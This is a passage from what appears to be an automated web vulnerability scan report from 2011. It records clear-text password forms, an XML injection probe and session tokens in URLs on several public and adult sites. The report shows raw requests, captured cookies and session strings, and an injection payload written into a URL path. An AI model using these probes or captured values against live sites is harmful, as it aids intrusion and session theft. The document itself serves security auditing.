3.5. http://www.mediafire.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form name="form_login1" id="form_login1" method="post" action="/dynamic/login.php" target="userwork" class="form"> <fieldset>
...[SNIP]...
</label> <input type="password" name="login_pass" id="login_pass" class="login_box" autocomplete="off" onclick="document.getElementById('login_penalty_message').style.display='none';"/> <a href="/lost_password.php">
...[SNIP]...

3.6. http://www.mediafire.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" id="use_fb_email_form" onsubmit="wP(2);return true;"> <label>Password:</label> <input type="password" name="use_fb_email_pass" id="use_fb_email_pass" class="login_box"> <label>
...[SNIP]...
</label> <input type="password" name="use_fb_email_pass2" id="use_fb_email_pass2" class="login_box"> <div>
...[SNIP]...

3.7. http://www.mediafire.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/tw_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="use_tw_email_pass" id="use_tw_email_pass" class="login_box"> <label>
...[SNIP]...
</label> <input type="password" name="use_tw_email_pass2" id="use_tw_email_pass2" class="login_box"> <div>
...[SNIP]...

3.8. http://www.mediafire.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <p class="soc_display_email" id="fb_step3_email">
...[SNIP]...
</label> <input type="password" name="mf_password" id="mf_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link">
...[SNIP]...

3.9. http://www.tudou.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:55:46 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 15 Aug 2011 18:53:30 GMT
Content-Length: 247630
Expires: Mon, 15 Aug 2011 19:02:36 GMT
Cache-Control: max-age=420
Vary: Accept-Encoding
Age: 10
X-Cache: HIT from www.tudou.com

<!DOCTYPE html>
<html>
<head>
<meta charset="gbk"/>

<title>......_...................._............,............,............</title>
<meta name="Keywords" content="......,....,....,........,...
...[SNIP]...
<div class="c">
                   <form method="post" action="http://login.tudou.com/login.do?act=login&amp;service=http://www.tudou.com/">
                       <p>
...[SNIP]...
<span class="lg_i"><input type="password" id="pwd" name="password" class="text" tabindex="2"></span>
...[SNIP]...

3.10. http://www.xhamstercams.com/cam/Juicy_Jules19/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /cam/Juicy_Jules19/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /cam/Juicy_Jules19/?gl=1&AFNO=1-0-624213-344279&UHNSMTY=458&lp=3 HTTP/1.1
Host: www.xhamstercams.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NaiadJP=cj1odHRwJTNBJTJGJTJGeGhhbXN0ZXIuY29tJTJGJmU9aHR0cCUzQSUyRiUyRnd3dy54aGFtc3RlcmNhbXMuY29tJTJGZXhwb3J0cyUyRmdvbGl2ZSUyRiUzRkFGTk8lM0QxLTAtNjI0MjEzLTM0NDI3OSUyNlVITlNNVFklM0Q0NTglMjZERiUzRDAlMjZscCUzRDMmbz0xMzEzNDM0NTg2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:48 GMT
Server: Apache
Set-Cookie: fcact=fcA6_2502%2F2Z; expires=Mon, 22-Aug-2011 18:56:48 GMT; path=/
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Vary: Accept-Encoding
Content-Length: 32305
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free live video chat, free nude cam, sex shows, adult streaming, free porn - XHamsterCam
...[SNIP]...
</p>
<form action="http://www.xhamstercams.com/login.php?AFNO=1-0-624213-344279&UHNSMTY=458" method="post" accept-charset="utf-8" name="loginform" id="loginform">
<input type="hidden" name="AFNO" value="1-0-624213-344279">
...[SNIP]...
</label>
<input type="password" size="8" name="sapwd">
<input type="submit" name="login" border="1" id="goBt" value="Go">
...[SNIP]...

3.11. http://xhamster.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m5
Set-Cookie: adNum=387; path=/
Vary: Accept-Encoding
Content-Length: 59237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>xHamster's Free Porn Videos</title>
<meta name="description" content="xH
...[SNIP]...
</div>
<form id='loginForm'>
<table cellpadding="0" cellspacing="0" style="display: table;">
...[SNIP]...
<td><input type='password' class='inp' name="password" id='password'></td>
...[SNIP]...

3.12. http://xhamster.com/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /login.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; prid=--; prib=--; TmplClickPopLayer=1; sc_limit=1; __utma=26208500.868426551.1313434646.1313434646.1313434646.1; __utmb=26208500.1.10.1313434646; __utmz=26208500.1313434646.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); adNum=386; mdg:uid=215%3Aa2

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:58:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m3
Vary: Accept-Encoding
Content-Length: 11903

<html>
<head>
<title>Login Form</title>
<meta name="description" content="Login Form"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free
...[SNIP]...
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 bgcolor="#FFFFFF">
       <FORM name=loginForm method=post action="http://xhamster.com/login.php?next=">
<TBODY>
...[SNIP]...
<TD style="PADDING-left: 5px;"><INPUT size=16 tabIndex=8 type=password name=password></TD>
...[SNIP]...

3.13. http://xhamster.com/signup.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /signup.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; adNum=12; mdg:uid=940%3Aa5; prid=--; prib=--; TmplClickPopLayer=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Srv: m10
Vary: Accept-Encoding
Content-Length: 29083

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
       <FORM id=loginForm name=loginForm method=post action="http://xhamster.com/login.php?next=">
       <TABLE cellSpacing=0 cellPadding=5 width="100%" border=0>
...[SNIP]...
<TD><INPUT tabIndex=2 type=password name=password></TD>
...[SNIP]...

3.14. http://xhamster.com/signup.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET /signup.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ismobile=0; stats=54; adNum=12; mdg:uid=940%3Aa5; prid=--; prib=--; TmplClickPopLayer=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:29 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Srv: m10
Vary: Accept-Encoding
Content-Length: 29083

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<BR>
                       <FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next=">
                           <INPUT type="hidden" name="prev" value="">
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password1></TD>
...[SNIP]...
<TD><INPUT type=password maxLength=20 name=password2></TD>
...[SNIP]...

4. XML injection

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

Request

GET /go/page]]>>/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:19 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,k8fUvvKsWDH_dC7HV3XQwBPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
Set-Cookie: REFERRAL_URL=http://medleyads.com/spot/5232.html; path=/; domain=.banners.bookofsex.com; expires=Tue, 16-Aug-2011 07:01:19 GMT
Set-Cookie: click_id_time=1511485567_2011-08-15 12:01:19; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 19:01:19 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki53-26.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 372020
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
==4) { if (x.status == 302) { ajax.get(x.getResponseHeader("Location"),f);}else{f(x)}}};if(m=='POST'){x.setRequestHeader('Content-type','application/x-www-form-urlencoded');}x.send(a)}; self.string_to_xml = function (a) { var x = null; a = a.replace(/\<\!\-\-/,'').replace(/\-\-\>
...[SNIP]...
(new DOMParser()).parseFromString(s, "text/xml"); } return x }; self.xml_xslt_transform = function (xml,xslt){ var mydiv = document.createElement('DIV'); if (window.ActiveXObject) { mydiv.innerHTML = xml.transformNode(xslt); } else if (document.implementation && document.implementation.createDocument) { xsltProcessor=new XSLTProcessor(); xsltProcessor.importStylesheet(xslt); mydiv.appendChild(xsltProce
...[SNIP]...

5. Session token in URL
There are 13 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


5.1. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:52 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,IPDnYK9LPElKtOp23iKt5ZzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki26-18.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13347
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=1760&site=ffadult&session=GQ5%60J%5EU%40jEUU+1313434702+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fmedleyads.com%2Fspot%2F5232.html&pagestate=&country=United+States&city=&lang=english&level=&gpid=g1255058&pid=p1935206.submad_70975_1_s5232" width=1 height=1 border=0></noscript>
...[SNIP]...

5.2. http://banners.bookofsex.com/go/page/iframe_cm_26400

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:59 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,auy/Hn8z06UROlnTRnsrjRPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki45-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24781
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<noscript><img src="https://glean.pop6.com/images/common/glean.gif?rand=2300&site=ffadult&session=G%3C%3A%3C%5D%40DQN%5B%3EL+1313434558+50.23.123.106+&pwsid=&pagename=ttp%3A%2F%2Fmedleyads.com%2Fspot%2F5232.html&pagestate=&country=United+States&city=&lang=english&level=&gpid=g1255058&pid=p1934513.submad_24810_1_s5232" width=1 height=1 border=0></noscript>
...[SNIP]...

5.3. http://glean.pop6.com/images/common/glean.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://glean.pop6.com
Path:   /images/common/glean.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/common/glean.gif?rand=3925&site=ff&session=%5E5L@NF%5E%5EjH6%201313434662%2050.23.123.106%20&pwsid=&pagename=/&pagestate=&referer=&country=United%20States&city=&lang=english&level=&gpid=g466070&pid=p9815&event=&pagerendertime=1064&testbed=0 HTTP/1.1
Host: glean.pop6.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ff_who=r,5w65lMjrqLrwOMX4tBJDb3u9zVyXXDfb8iqcLCgxMtTLydmHHDS2BQhVEFNyJfQm4GGOFc5Xe_Ay7fmuhWNXhiJ_qPyy_w/CzZc1DYiFS5o5eIrIEI51W9T/zDmtNu/o; v_hash=_english_0; IP_COUNTRY=United States; ff_tr=r,E7RSUL0YFx2gJ7Q5eed7yd8wG821Dq4Jd7gqlIWv6YPoJFKcFXi8XGVOPB7IKuq0; LOCATION_FROM_IP=ip_type&Mapped&connection&tx&country_code&US&lat&37.33053&asn&36351&state&California&ip_routing_type&fixed&carrier&softlayer+technologies+inc.&city&San+Jose&postal_code&95122&country_code_cf&99&state_cf&95&latitude&37.33053&second_level_domain&softlayer&country&United+States&longitude&-121.83823&country_name&United+States&area_code&408&timezone&-8.0&line_speed&high&aol&0&top_level_domain&com&region&southwest&city_cf&80&pmsa&7400&zip&95122&msa&41940&continent&north+america&lon&-121.83823&dma_code&807; HISTORY=20110815-1-Dc; REFERRAL_URL=; click_id_time=1867065876_2011-08-15 11:57:42

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:34 GMT
